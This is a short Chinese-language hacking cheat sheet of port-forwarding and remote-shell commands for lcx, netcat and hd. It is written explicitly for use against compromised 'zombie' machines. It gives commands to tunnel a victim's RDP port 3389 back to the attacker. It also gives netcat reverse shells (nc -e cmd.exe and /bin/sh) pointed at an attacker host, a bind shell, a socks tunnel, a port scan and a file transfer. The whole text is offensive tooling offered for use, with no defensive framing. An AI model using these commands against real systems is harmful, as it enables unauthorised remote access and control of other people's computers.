3个小工具的端口转发命令

如在本机B上监听 -listen 51 3389，在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。

 

本机：lcx.exe -listen 51 3389  //监听 51端口并转发到3389端口

 

肉鸡 lcx.exe -slave $本机IP 51 $需要转发的端口的IP 3389

 

不可配合sockscap使用，只能转发单一端口，没有代理功能。

 

lcx -listen 53  5555 www.2cto.com

lcx -slave bra.adminsec.com  53 10.33.50.10 1180

 

======================================

 

nc -vvlp port //监听本地的一个端口

 

nc -e cmd.exe attacker $本地ip -p port

nc -e /bin/sh attacker $本地ip -p port

 

======================================

 

hd

 

本机监听 hd -s -listen 53 1180 //此命令是将连接进来的53端口的数据包连接到1180端口。

 

对方机器 hd -s -connect x.x.x.x 53

 

然后用sockscap实现代理功能

 

SOCK 服务器IP 127.0.0.1 端口1180

 

socks version 5 resolve all names remot

 

=======================================

 

NC的一些其他用法

NC传送文件 nc －vv -l -p port > path\file.txt

 

扫描远程主机，例子：

 

格式：nc -nvv -w2 -z 192.168.x.x 80-445

讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

REMOTE主机绑定SHELL，例子：

格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe

讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

REMOTE主机绑定SHELL并反向连接，例子：

格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354

讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口